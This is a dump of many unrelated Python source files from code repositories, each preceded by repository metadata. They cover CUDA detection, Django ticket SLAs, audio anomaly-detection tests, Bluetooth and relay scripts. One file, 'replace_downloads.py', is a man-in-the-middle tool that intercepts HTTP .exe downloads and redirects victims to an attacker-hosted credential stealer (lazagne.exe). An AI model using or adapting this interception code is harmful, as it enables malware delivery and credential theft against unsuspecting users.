    versions = cuda_vers.keys()
    return ' '.join(versions)
def detect_cuda_ver():
    """Return the CUDA release number reported by the local ``nvcc`` tool.

    Raises when the detected release is not in the supported table.
    """
    raw_version = subprocess.check_output('nvcc --version', shell=True)
    release = re.search('release ([.0-9]+), V([.0-9]+)', str(raw_version)).group(1)
    if release not in get_supported_vers():
        raise Exception("Unsupported cuda version: {}, Please check your 'nvcc' version.".format(release))
    return release
# Command-line dispatch. The first argument selects the action:
#   c <classifier> -- validate a jar classifier against the local CUDA version
#   d              -- print the CUDA version detected from nvcc
#   g              -- print a classifier (see NOTE below)
#   l              -- print all supported versions (default when no args)
if __name__ == "__main__":
    num_args = len(sys.argv)
    action = sys.argv[1].lower() if num_args > 1 else 'l'
    if action =='c':
        # Second argument is the classifier under test; the empty string
        # denotes the default (un-suffixed) artifact.
        classifier = sys.argv[2].lower() if num_args > 2 else ''
        check_classifier(classifier)
    elif action == 'd':
        print(detect_cuda_ver())
    elif action == 'g':
        # NOTE(review): get_classifier() is not defined anywhere in this
        # module, so the 'g' action raises NameError at runtime -- confirm
        # the intended helper name.
        print(get_classifier())
    elif action == 'l':
        print(get_supported_vers_str())
    else:
        print("Unsupported action: " + action)
| 25.386667 | 108 | 0.644958 |
4688b12d1b22b922d562bb53aed309b70230470c | 294 | py | Python | hitchhikeproject/hitchhikeapp/migrations/0011_delete_dog.py | AlexW57/HitchHikeProject | 54e02a82fb322cb7ea5d4fdc323e2e3c9d1e9b89 | [
"MIT"
] | null | null | null | hitchhikeproject/hitchhikeapp/migrations/0011_delete_dog.py | AlexW57/HitchHikeProject | 54e02a82fb322cb7ea5d4fdc323e2e3c9d1e9b89 | [
"MIT"
] | null | null | null | hitchhikeproject/hitchhikeapp/migrations/0011_delete_dog.py | AlexW57/HitchHikeProject | 54e02a82fb322cb7ea5d4fdc323e2e3c9d1e9b89 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.2 on 2020-03-29 19:11
from django.db import migrations
| 17.294118 | 49 | 0.602041 |
4689c871990ae00114397708dbcc29fc3f6a6ac6 | 5,087 | py | Python | support/models.py | gurupratap-matharu/django-tickets-app | 8200af606e382f8806511c318961589f34375cdf | [
"MIT"
] | 1 | 2020-10-16T16:37:04.000Z | 2020-10-16T16:37:04.000Z | support/models.py | gurupratap-matharu/django-tickets-app | 8200af606e382f8806511c318961589f34375cdf | [
"MIT"
] | null | null | null | support/models.py | gurupratap-matharu/django-tickets-app | 8200af606e382f8806511c318961589f34375cdf | [
"MIT"
] | null | null | null | import pytz
from datetime import date, time, datetime, timedelta
from django.core.exceptions import ValidationError
from django.db import models
# Office shift boundaries on a 24-hour clock, and the resulting length of a
# working day in hours (used as the divisor when converting SLA hours to days).
START_HOUR = 9
END_HOUR = 18
workingHours = END_HOUR - START_HOUR
def findExpiryDate(sla):
    """Compute the expiry datetime (UTC) for a ticket.

    The SLA budget is counted in office hours (START_HOUR-END_HOUR) on
    business days only; weekends and holidays are skipped.

    Args:
        sla: number of office hours allowed to resolve the ticket.

    Returns:
        A timezone-aware datetime marking the deadline.
    """
    now = datetime.now()

    # Tickets arriving before the shift opens start counting today (flag=0);
    # anything later starts from tomorrow's shift opening (flag=1).
    flag = 1
    if now.hour < START_HOUR:
        flag = 0

    # Ticket received during office hours: the hours remaining in today's
    # shift are consumed immediately, so deduct them from the SLA budget.
    # (Bug fix: the remaining hours are END_HOUR - now.hour; the previous
    # code subtracted the SLA itself, which produced negative budgets.)
    if START_HOUR < now.hour < END_HOUR:
        hoursLeftToday = END_HOUR - now.hour
        sla -= hoursLeftToday
    # NOTE(review): a ticket arriving during the START_HOUR hour falls through
    # both branches and is treated as starting tomorrow -- confirm intended.

    tomorrow = date.today() + timedelta(days=flag)
    shiftTime = time(START_HOUR, 0, 0)
    dt = datetime.combine(tomorrow, shiftTime, pytz.utc)
    dt = adjust_Weekends_And_Holidays(dt)  # skip ahead if we land on a weekend/holiday

    # Convert the remaining SLA budget into whole office days plus leftover
    # hours, then walk forward over business days only.
    days, hours = divmod(sla, workingHours)
    dt += timedelta(hours=hours)
    dt = adjust_Weekends_And_Holidays(dt, days=days)  # skip weekends/holidays
    return dt
def isWeekend(dt):
    """Return True when *dt* falls on a Saturday or Sunday.

    Bug fix: ``date.weekday()`` numbers Monday as 0 and Sunday as 6, so the
    weekend days are 5 (Saturday) and 6 (Sunday). The previous test
    (``0 < weekday < 6``) assumed a Sunday-first numbering and therefore
    classified Monday as a weekend and Saturday as a weekday.
    """
    return dt.weekday() >= 5
def isHoliday(dt):
    """Return True when a Holiday row exists for *dt*'s calendar date."""
    matches = Holiday.objects.filter(day=dt.date())
    return matches.exists()
def adjust_Weekends_And_Holidays(dt, days=0):
    """Roll *dt* forward onto a working day, then advance *days* working days.

    Weekend and holiday dates are stepped over without consuming the *days*
    budget.
    """
    def _non_working(candidate):
        return isWeekend(candidate) or isHoliday(candidate)

    one_day = timedelta(days=1)
    # First land on a working day.
    while _non_working(dt):
        dt += one_day
    # Then consume the budget, counting only working days.
    remaining = days
    while remaining:
        dt += one_day
        if not _non_working(dt):
            remaining -= 1
    return dt
| 30.279762 | 98 | 0.649892 |
4689fd0a503a48da1fc4fb1000e346ebf2f7be93 | 605 | py | Python | tests/port_tests/point_tests/test_bounding_box.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 7 | 2020-05-07T08:13:44.000Z | 2021-12-17T07:33:51.000Z | tests/port_tests/point_tests/test_bounding_box.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 17 | 2019-11-29T23:17:26.000Z | 2020-12-20T15:47:17.000Z | tests/port_tests/point_tests/test_bounding_box.py | skrat/martinez | 86db48324cb50ecb52be8ab2e4278a6d5cdd562b | [
"MIT"
] | 1 | 2020-12-17T22:44:21.000Z | 2020-12-17T22:44:21.000Z | from hypothesis import given
from tests.port_tests.hints import (PortedBoundingBox,
PortedPoint)
from tests.utils import equivalence
from . import strategies
| 31.842105 | 77 | 0.707438 |
468a1af4f4a7334446b0e0152db92174a4f3295b | 424 | py | Python | test/conftest.py | alexandonian/lightning | 90350fd454cd7a51c35adadf5b9753868ac6dccd | [
"Apache-2.0"
] | null | null | null | test/conftest.py | alexandonian/lightning | 90350fd454cd7a51c35adadf5b9753868ac6dccd | [
"Apache-2.0"
] | null | null | null | test/conftest.py | alexandonian/lightning | 90350fd454cd7a51c35adadf5b9753868ac6dccd | [
"Apache-2.0"
] | null | null | null | import pytest
# import station
| 23.555556 | 66 | 0.625 |
468ce700bfaf82c4969d9da9bf954d79c010ee00 | 7,960 | py | Python | pytorch_translate/dual_learning/dual_learning_models.py | dzhulgakov/translate | 018d3eed8d93ff32e86c912e68045c7a3f4ed0b7 | [
"BSD-3-Clause"
] | 1 | 2020-07-24T10:59:17.000Z | 2020-07-24T10:59:17.000Z | pytorch_translate/dual_learning/dual_learning_models.py | dzhulgakov/translate | 018d3eed8d93ff32e86c912e68045c7a3f4ed0b7 | [
"BSD-3-Clause"
] | null | null | null | pytorch_translate/dual_learning/dual_learning_models.py | dzhulgakov/translate | 018d3eed8d93ff32e86c912e68045c7a3f4ed0b7 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python3
import logging
import torch.nn as nn
from fairseq import checkpoint_utils
from fairseq.models import BaseFairseqModel, register_model
from pytorch_translate import rnn
from pytorch_translate.rnn import (
LSTMSequenceEncoder,
RNNDecoder,
RNNEncoder,
RNNModel,
base_architecture,
)
from pytorch_translate.tasks.pytorch_translate_task import PytorchTranslateTask
logger = logging.getLogger(__name__)
| 38.829268 | 91 | 0.650377 |
468d721e5802a550fe36c1b0efccab7310faf51c | 697 | py | Python | thgsp/sampling/__init__.py | qiuyy20/thgsp | 2cd09ba09716cc716a3d4e125d2d0b20f5cc942d | [
"BSD-3-Clause"
] | null | null | null | thgsp/sampling/__init__.py | qiuyy20/thgsp | 2cd09ba09716cc716a3d4e125d2d0b20f5cc942d | [
"BSD-3-Clause"
] | null | null | null | thgsp/sampling/__init__.py | qiuyy20/thgsp | 2cd09ba09716cc716a3d4e125d2d0b20f5cc942d | [
"BSD-3-Clause"
] | null | null | null | from ._utils import construct_dia, construct_hth, construct_sampling_matrix
from .bsgda import bsgda, computing_sets, recon_bsgda, solving_set_covering
from .ess import ess, ess_sampling, recon_ess
from .fastgsss import fastgsss, recon_fastssss
from .rsbs import cheby_coeff4ideal_band_pass, estimate_lk, recon_rsbs, rsbs
__all__ = [
"ess",
"ess_sampling",
"bsgda",
"computing_sets",
"solving_set_covering",
"cheby_coeff4ideal_band_pass",
"estimate_lk",
"rsbs",
"fastgsss",
# reconstruction
"recon_fastssss",
"recon_bsgda",
"recon_ess",
"recon_rsbs",
# utils
"construct_sampling_matrix",
"construct_hth",
"construct_dia",
]
| 25.814815 | 76 | 0.71736 |
468df8250e372c77ba85fdae3eaf93df4bca1fda | 3,382 | py | Python | h2o-py/tests/testdir_generic_model/pyunit_generic_model_mojo_glm.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | 1 | 2022-03-15T06:08:14.000Z | 2022-03-15T06:08:14.000Z | h2o-py/tests/testdir_generic_model/pyunit_generic_model_mojo_glm.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | 58 | 2021-10-01T12:43:37.000Z | 2021-12-08T22:58:43.000Z | h2o-py/tests/testdir_generic_model/pyunit_generic_model_mojo_glm.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | null | null | null | import tempfile
import os
import sys
sys.path.insert(1,"../../")
import h2o
from h2o.estimators import H2OGeneralizedLinearEstimator, H2OGenericEstimator
from tests import pyunit_utils
from tests.testdir_generic_model import compare_output, Capturing, compare_params
if __name__ == "__main__":
    # Standalone invocation: run each MOJO test through the pyunit harness.
    pyunit_utils.standalone_test(mojo_model_test_binomial)
    pyunit_utils.standalone_test(mojo_model_test_multinomial)
    pyunit_utils.standalone_test(mojo_model_test_regression)
    pyunit_utils.standalone_test(mojo_model_test_ordinal)
else:
    # Imported by the test runner: execute the tests directly at import time.
    mojo_model_test_binomial()
    mojo_model_test_multinomial()
    mojo_model_test_regression()
    mojo_model_test_ordinal()
| 46.328767 | 136 | 0.77262 |
468f2faee1688669d20b891ff6fb1ee641d68824 | 9,160 | py | Python | test/HPE3ParClient_base.py | jyotsnalothe/python-3parclient | aa6ece402c2e3e83cae102f04ffc83f9e2421bf3 | [
"Apache-2.0"
] | 35 | 2015-12-03T16:46:11.000Z | 2022-01-19T10:50:35.000Z | test/HPE3ParClient_base.py | jyotsnalothe/python-3parclient | aa6ece402c2e3e83cae102f04ffc83f9e2421bf3 | [
"Apache-2.0"
] | 57 | 2015-12-01T00:34:39.000Z | 2022-03-25T12:00:50.000Z | test/HPE3ParClient_base.py | jyotsnalothe/python-3parclient | aa6ece402c2e3e83cae102f04ffc83f9e2421bf3 | [
"Apache-2.0"
] | 64 | 2016-04-24T00:22:43.000Z | 2021-08-06T09:29:38.000Z | # (c) Copyright 2015 Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test base class of 3PAR Client."""
import os
import sys
import unittest
import subprocess
import time
import inspect
from pytest_testconfig import config
import datetime
from functools import wraps
from hpe3parclient import client, file_client
TIME = datetime.datetime.now().strftime('%H%M%S')
try:
# For Python 3.0 and later
from urllib.parse import urlparse
except ImportError:
# Fall back to Python 2's urllib2
from urlparse import urlparse
| 37.235772 | 78 | 0.533188 |
468fc07953c8147b25a2f944027c5638901e823c | 4,452 | py | Python | test/drivers/second_quantization/hdf5d/test_driver_hdf5.py | jschuhmac/qiskit-nature | b8b1181d951cf8fa76fe0db9e5ea192dad5fb186 | [
"Apache-2.0"
] | null | null | null | test/drivers/second_quantization/hdf5d/test_driver_hdf5.py | jschuhmac/qiskit-nature | b8b1181d951cf8fa76fe0db9e5ea192dad5fb186 | [
"Apache-2.0"
] | null | null | null | test/drivers/second_quantization/hdf5d/test_driver_hdf5.py | jschuhmac/qiskit-nature | b8b1181d951cf8fa76fe0db9e5ea192dad5fb186 | [
"Apache-2.0"
] | null | null | null | # This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2022.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test Driver HDF5 """
import os
import pathlib
import shutil
import tempfile
import unittest
import warnings
from test import QiskitNatureTestCase
from test.drivers.second_quantization.test_driver import TestDriver
from qiskit_nature.drivers.second_quantization import HDF5Driver
from qiskit_nature.drivers import QMolecule
from qiskit_nature.properties.second_quantization.electronic import ElectronicStructureDriverResult
if __name__ == "__main__":
unittest.main()
| 39.75 | 99 | 0.655885 |
469076a38899f95c1e7c8c2bdfb61492327f8f5d | 11,269 | py | Python | 01_test_pytorch.py | yokaji/dcase2021_task2_baseline_ae | 47b621e6abd0502fed2123c31c61b081bce5c223 | [
"MIT"
] | null | null | null | 01_test_pytorch.py | yokaji/dcase2021_task2_baseline_ae | 47b621e6abd0502fed2123c31c61b081bce5c223 | [
"MIT"
] | null | null | null | 01_test_pytorch.py | yokaji/dcase2021_task2_baseline_ae | 47b621e6abd0502fed2123c31c61b081bce5c223 | [
"MIT"
] | null | null | null | ########################################################################
# import default libraries
########################################################################
import os
import csv
import sys
import gc
########################################################################
########################################################################
# import additional libraries
########################################################################
import numpy as np
import scipy.stats
import torch
import torch.nn as nn
# from import
from tqdm import tqdm
from sklearn import metrics
try:
from sklearn.externals import joblib
except:
import joblib
# original lib
import common as com
from pytorch_model import AutoEncoder
########################################################################
########################################################################
# load parameter.yaml
########################################################################
param = com.yaml_load()
#######################################################################
########################################################################
# output csv file
########################################################################
########################################################################
########################################################################
# main 01_test.py
########################################################################
# Evaluate each machine type's trained autoencoder: score every test clip by
# reconstruction error, write per-section anomaly-score and decision CSVs, and
# (in development mode) accumulate AUC/pAUC/precision/recall/F1 summaries.
if __name__ == "__main__":
    ####################################################################
    # set device
    ####################################################################
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    print("device : {}".format(device))
    ####################################################################
    # check mode
    # "development": mode == True
    # "evaluation": mode == False
    mode = com.command_line_chk()
    if mode is None:
        sys.exit(-1)
    # make output result directory
    os.makedirs(param["result_directory"], exist_ok=True)
    # load base directory
    dirs = com.select_dirs(param=param, mode=mode)
    # initialize lines in csv for AUC and pAUC
    csv_lines = []
    if mode:
        performance_over_all = []
    # loop of the base directory
    for idx, target_dir in enumerate(dirs):
        print("\n===========================")
        print("[{idx}/{total}] {target_dir}".format(target_dir=target_dir, idx=idx+1, total=len(dirs)))
        machine_type = os.path.split(target_dir)[1]
        print("============== MODEL LOAD ==============")
        # load model file
        model_file = "{model}/model_{machine_type}.hdf5".format(model=param["model_directory"],
                                                                machine_type=machine_type)
        if not os.path.exists(model_file):
            com.logger.error("{} model not found ".format(machine_type))
            sys.exit(-1)
        # The AE consumes a flattened mel-spectrogram patch of n_mels * n_frames.
        input_channel = param["feature"]["n_mels"] * param["feature"]["n_frames"]
        model = AutoEncoder(input_channel).to(device)
        model.eval()
        if device.type == "cuda":
            model.load_state_dict(torch.load(model_file))
        elif device.type == "cpu":
            model.load_state_dict(torch.load(model_file, map_location=torch.device("cpu")))
        # load anomaly score distribution for determining threshold
        score_distr_file_path = "{model}/score_distr_{machine_type}.pkl".format(model=param["model_directory"],
                                                                                machine_type=machine_type)
        shape_hat, loc_hat, scale_hat = joblib.load(score_distr_file_path)
        # determine threshold for decision
        # (quantile of the gamma distribution fitted to training-time scores)
        decision_threshold = scipy.stats.gamma.ppf(q=param["decision_threshold"], a=shape_hat, loc=loc_hat, scale=scale_hat)
        if mode:
            # results for each machine type
            csv_lines.append([machine_type])
            csv_lines.append(["section", "domain", "AUC", "pAUC", "precision", "recall", "F1 score"])
            performance = []
        dir_names = ["source_test", "target_test"]
        for dir_name in dir_names:
            #list machine id
            section_names = com.get_section_names(target_dir, dir_name=dir_name)
            for section_name in section_names:
                # load test file
                files, y_true = com.file_list_generator(target_dir=target_dir,
                                                        section_name=section_name,
                                                        dir_name=dir_name,
                                                        mode=mode)
                # setup anomaly score file path
                anomaly_score_csv = "{result}/anomaly_score_{machine_type}_{section_name}_{dir_name}.csv".format(result=param["result_directory"],
                                                                                                                 machine_type=machine_type,
                                                                                                                 section_name=section_name,
                                                                                                                 dir_name=dir_name)
                anomaly_score_list = []
                # setup decision result file path
                decision_result_csv = "{result}/decision_result_{machine_type}_{section_name}_{dir_name}.csv".format(result=param["result_directory"],
                                                                                                                     machine_type=machine_type,
                                                                                                                     section_name=section_name,
                                                                                                                     dir_name=dir_name)
                decision_result_list = []
                print("\n============== BEGIN TEST FOR A SECTION ==============")
                # reconstruction-error anomaly score per test file
                y_pred = [0. for k in files]
                for file_idx, file_path in tqdm(enumerate(files), total=len(files)):
                    try:
                        data = com.file_to_vectors(file_path,
                                                   n_mels=param["feature"]["n_mels"],
                                                   n_frames=param["feature"]["n_frames"],
                                                   n_fft=param["feature"]["n_fft"],
                                                   hop_length=param["feature"]["hop_length"],
                                                   power=param["feature"]["power"])
                    except:
                        com.logger.error("File broken!!: {}".format(file_path))
                    # NOTE(review): when file_to_vectors raises, `data` is left
                    # over from the previous iteration (or undefined on the
                    # first), yet scoring still proceeds below -- confirm
                    # whether broken files should be skipped with `continue`.
                    data = torch.tensor(data, dtype=torch.float32).to(device)
                    reconst = model(data)
                    mseloss = nn.functional.mse_loss(data.detach(), reconst.detach())
                    y_pred[file_idx] = mseloss.item()
                    # store anomaly scores
                    anomaly_score_list.append([os.path.basename(file_path), y_pred[file_idx]])
                    # store decision results
                    if y_pred[file_idx] > decision_threshold:
                        decision_result_list.append([os.path.basename(file_path), 1])
                    else:
                        decision_result_list.append([os.path.basename(file_path), 0])
                # output anomaly scores
                # NOTE(review): save_csv is referenced here but its definition
                # is missing from this excerpt (see the "output csv file"
                # banner above) -- presumably a small csv.writer wrapper.
                save_csv(save_file_path=anomaly_score_csv, save_data=anomaly_score_list)
                com.logger.info("anomaly score result -> {}".format(anomaly_score_csv))
                # output decision results
                save_csv(save_file_path=decision_result_csv, save_data=decision_result_list)
                com.logger.info("decision result -> {}".format(decision_result_csv))
                if mode:
                    # append AUC and pAUC to lists
                    auc = metrics.roc_auc_score(y_true, y_pred)
                    p_auc = metrics.roc_auc_score(y_true, y_pred, max_fpr=param["max_fpr"])
                    tn, fp, fn, tp = metrics.confusion_matrix(y_true, [1 if x > decision_threshold else 0 for x in y_pred]).ravel()
                    prec = tp / np.maximum(tp + fp, sys.float_info.epsilon)
                    recall = tp / np.maximum(tp + fn, sys.float_info.epsilon)
                    f1 = 2.0 * prec * recall / np.maximum(prec + recall, sys.float_info.epsilon)
                    csv_lines.append([section_name.split("_", 1)[1], dir_name.split("_", 1)[0], auc, p_auc, prec, recall, f1])
                    performance.append([auc, p_auc, prec, recall, f1])
                    performance_over_all.append([auc, p_auc, prec, recall, f1])
                    com.logger.info("AUC : {}".format(auc))
                    com.logger.info("pAUC : {}".format(p_auc))
                    com.logger.info("precision : {}".format(prec))
                    com.logger.info("recall : {}".format(recall))
                    com.logger.info("F1 score : {}".format(f1))
                print("\n============ END OF TEST FOR A SECTION ============")
        if mode:
            # calculate averages for AUCs and pAUCs
            amean_performance = np.mean(np.array(performance, dtype=float), axis=0)
            csv_lines.append(["arithmetic mean", ""] + list(amean_performance))
            hmean_performance = scipy.stats.hmean(np.maximum(np.array(performance, dtype=float), sys.float_info.epsilon), axis=0)
            csv_lines.append(["harmonic mean", ""] + list(hmean_performance))
            csv_lines.append([])
        # drop references to the last batch and the model before the next machine type
        del data
        del model
    if mode:
        csv_lines.append(["", "", "AUC", "pAUC", "precision", "recall", "F1 score"])
        # calculate averages for AUCs and pAUCs
        amean_performance = np.mean(np.array(performance_over_all, dtype=float), axis=0)
        csv_lines.append(["arithmetic mean over all machine types, sections, and domains", ""] + list(amean_performance))
        hmean_performance = scipy.stats.hmean(np.maximum(np.array(performance_over_all, dtype=float), sys.float_info.epsilon), axis=0)
        csv_lines.append(["harmonic mean over all machine types, sections, and domains", ""] + list(hmean_performance))
        csv_lines.append([])
    # output results
    result_path = "{result}/{file_name}".format(result=param["result_directory"], file_name=param["result_file"])
    com.logger.info("results -> {}".format(result_path))
    save_csv(save_file_path=result_path, save_data=csv_lines)
| 50.308036 | 151 | 0.460112 |
4690da1c3b97e01a8795122d75752b424704a346 | 1,706 | py | Python | Replace Downloads/replace_downloads.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | null | null | null | Replace Downloads/replace_downloads.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | null | null | null | Replace Downloads/replace_downloads.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | 1 | 2021-12-20T11:44:51.000Z | 2021-12-20T11:44:51.000Z | #!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
ack_list = []
def process_packet(packet):
    """Modify downloads files on the fly while target uses HTTP/HTTPS.
    Do not forget to choose the port you will be using in line 22/29.
    Do not forget to modify line 24 and 35 and uncomment them afterwards."""
    # NOTE(review): this is template code -- the "#CHOOSE PORT HERE" and
    # "#Input ..." placeholders below are comments spliced into expressions,
    # so this file is NOT valid Python until they are replaced with real
    # values as the docstring instructs.
    scapy_packet = scapy.IP (packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
        # Outgoing request on the chosen HTTP(S) port: remember the ACK of any
        # .exe download request that is not already served by our own host.
        if scapy_packet[scapy.TCP].dport == #CHOOSE PORT HERE: 80 / 10000:
            # print("HTTP Request")
            if ".exe" in scapy_packet[scapy.Raw].load and #Input IP of your web server here: "10.0.2.15" not in scapy_packet[scapy.Raw].load:
                print("Captured .exe file in the Request packet.")
                ack_list.append(scapy_packet[scapy.TCP].ack)
                # print(scapy_packet.show())
        # Matching response: its SEQ equals the recorded ACK; swap the payload
        # for a 301 redirect pointing at the replacement executable.
        elif scapy_packet[scapy.TCP].sport ==#CHOOSE PORT HERE: 80 / 10000:
            # print("HTTP Response")
            if scapy_packet[scapy.TCP].seq in ack_list:
                ack_list.remove(scapy_packet[scapy.TCP].seq)
                print("Replacing the file.")
                # print(scapy_packet.show())
                # NOTE(review): set_load is not defined or imported in this
                # file -- confirm where this helper comes from.
                modified_packet = set_load(scapy_packet, #Input the full path of your executable here: "HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.15/Evil%20Files/lazagne.exe\n\n")
                packet.set_payload(str(modified_packet))
    # Hand every packet (modified or not) back to the kernel queue.
    packet.accept()
# Bind NFQUEUE queue number 0 (expected to be set up via iptables) to the
# handler above and start the blocking processing loop.
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
| 37.086957 | 193 | 0.654162 |
46917396382ee9f0addf54bb780182338681e694 | 1,757 | py | Python | tmpmodels.py | firaan1/iamgrateful | 445260313ab94dfdaf310a6766e848c8df94b624 | [
"MIT"
] | null | null | null | tmpmodels.py | firaan1/iamgrateful | 445260313ab94dfdaf310a6766e848c8df94b624 | [
"MIT"
] | null | null | null | tmpmodels.py | firaan1/iamgrateful | 445260313ab94dfdaf310a6766e848c8df94b624 | [
"MIT"
] | null | null | null | from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine
from sqlalchemy import Column, Integer, String, Text, ForeignKey, DateTime, func, Boolean
from sqlalchemy.orm import relation, sessionmaker, relationship, backref
from datetime import datetime
import os
# Database
DATABASE = 'sqlite:///db.sqlite3'
DEBUG = True
# ORM
Base = declarative_base()
# model
# if __name__ == '__main__':
# connection
engine = create_engine(DATABASE, echo = DEBUG)
session_factory = sessionmaker(bind = engine)
session = session_factory()
# initialize database
if not os.path.exists('db.sqlite3'):
Base.metadata.create_all(engine)
| 30.824561 | 89 | 0.712009 |
4691f105e7b4e6d56ef7ec3a85a8060f44a867c1 | 579 | py | Python | doc/filters.py | CargobaseDev/openpyxl | 782ba90d26be452379fc06f45227e12bca9bade4 | [
"MIT"
] | 6 | 2018-05-15T05:08:52.000Z | 2021-12-23T12:31:28.000Z | doc/filters.py | CargobaseDev/openpyxl | 782ba90d26be452379fc06f45227e12bca9bade4 | [
"MIT"
] | 1 | 2022-01-01T15:08:26.000Z | 2022-01-01T15:08:36.000Z | doc/filters.py | CargobaseDev/openpyxl | 782ba90d26be452379fc06f45227e12bca9bade4 | [
"MIT"
] | 6 | 2020-03-23T15:59:14.000Z | 2021-09-18T09:54:57.000Z | from openpyxl import Workbook
# Demonstrates openpyxl auto-filters: write a small fruit table, then
# attach a value filter on the fruit column and a sort condition on the
# quantity column, and save the result.
workbook = Workbook()
sheet = workbook.active

header = ("Fruit", "Quantity")
rows = [
    ("Kiwi", 3),
    ("Grape", 15),
    ("Apple", 3),
    ("Peach", 3),
    ("Pomegranate", 3),
    ("Pear", 3),
    ("Tangerine", 3),
    ("Blueberry", 3),
    ("Mango", 3),
    ("Watermelon", 3),
    ("Blackberry", 3),
    ("Orange", 3),
    ("Raspberry", 3),
    ("Banana", 3),
]

sheet.append(header)
for row in rows:
    sheet.append(row)

# Filter range covers the header row plus all 14 data rows.
sheet.auto_filter.ref = "A1:B15"
# Show only these fruits (column index 0 = "Fruit").
sheet.auto_filter.add_filter_column(0, ["Kiwi", "Apple", "Mango"])
# Sort by the quantity column, header row excluded.
sheet.auto_filter.add_sort_condition("B2:B15")
workbook.save("filtered.xlsx")
| 18.09375 | 63 | 0.544041 |
4692314ed6b0b1046dcbfa825a3d464141899b16 | 1,150 | py | Python | Bleak/two_devices.py | mbdev2/MIS_FindMyProfessor | fa6a8e9b787013b2eadbc021b0d74210de689872 | [
"MIT"
] | null | null | null | Bleak/two_devices.py | mbdev2/MIS_FindMyProfessor | fa6a8e9b787013b2eadbc021b0d74210de689872 | [
"MIT"
] | null | null | null | Bleak/two_devices.py | mbdev2/MIS_FindMyProfessor | fa6a8e9b787013b2eadbc021b0d74210de689872 | [
"MIT"
] | null | null | null | from bleak import BleakClient
import asyncio
import functools
# 128-bit form of the standard Battery Level characteristic UUID (0x2A19).
# NOTE(review): the trailing ``.format(0x2A19)`` is a no-op — the string
# contains no ``{}`` placeholder, so the argument is silently ignored.
notify_uuid = "00002a19-0000-1000-8000-00805f9b34fb".format(0x2A19)
if __name__ == "__main__":
    # ``run`` is not defined in this excerpt (its definition appears to have
    # been truncated) — presumably it connects to both BLE device addresses
    # listed below. TODO confirm against the original source.
    run(
        ["96E8409A-F2EB-4029-B3DC-615FADE0C838","D31CB0CA-890E-476B-80D9-80ED8A3AA69A"]
    )
| 27.380952 | 100 | 0.691304 |
4692c2ff5367cf7fc52d9c66cbd5187236f80e7d | 655 | py | Python | binary search tree insertion.py | buhuhaha/python | 4ff72ac711f0948ae5bcb0886d68e8df77fe515b | [
"MIT"
] | null | null | null | binary search tree insertion.py | buhuhaha/python | 4ff72ac711f0948ae5bcb0886d68e8df77fe515b | [
"MIT"
] | null | null | null | binary search tree insertion.py | buhuhaha/python | 4ff72ac711f0948ae5bcb0886d68e8df77fe515b | [
"MIT"
] | null | null | null | if __name__ == '__main__':
keys = [15, 10, 20, 8, 12, 16, 25]
root = constructBST(keys)
inorder(root) | 22.586207 | 44 | 0.58626 |
469393ea6c4b1c5c7b78ca579da1a18fef848cb3 | 625 | py | Python | tests/test_env_helpers.py | Azraeht/py-ndebug | b7d13b39adc6c0ece6b0d527752869fd94eb9f8a | [
"MIT"
] | null | null | null | tests/test_env_helpers.py | Azraeht/py-ndebug | b7d13b39adc6c0ece6b0d527752869fd94eb9f8a | [
"MIT"
] | 1 | 2020-03-24T17:29:40.000Z | 2020-03-24T17:29:40.000Z | tests/test_env_helpers.py | Azraeht/py-ndebug | b7d13b39adc6c0ece6b0d527752869fd94eb9f8a | [
"MIT"
] | 1 | 2020-03-24T16:41:31.000Z | 2020-03-24T16:41:31.000Z | from ndebug import env_helpers
| 31.25 | 91 | 0.5536 |
4693fb42192c5502c57c49f8441c5cf7ba66b002 | 1,709 | py | Python | relay_lib_seeed_test_2.py | johnwargo/seeed-studio-relay-v2 | ce1b84b0f0001baa7ec4729dc2967531da3bdc22 | [
"MIT"
] | 1 | 2021-05-07T07:40:27.000Z | 2021-05-07T07:40:27.000Z | relay_lib_seeed_test_2.py | johnwargo/seeed-studio-relay-v2 | ce1b84b0f0001baa7ec4729dc2967531da3bdc22 | [
"MIT"
] | null | null | null | relay_lib_seeed_test_2.py | johnwargo/seeed-studio-relay-v2 | ce1b84b0f0001baa7ec4729dc2967531da3bdc22 | [
"MIT"
] | null | null | null | #!/usr/bin/python
'''*****************************************************************************************************************
Seeed Studio Relay Board Library V2
Test Application #2
By John M. Wargo (https://www.johnwargo.com)
********************************************************************************************************************'''
import sys
import time
from seeed_relay_v1 import Relay
# Now see what we're supposed to do next
if __name__ == "__main__":
    # Create the relay object
    relay = Relay()
    try:
        # process_loop() is defined earlier in this file (not visible in
        # this excerpt); presumably it cycles the relays until interrupted.
        # TODO confirm.
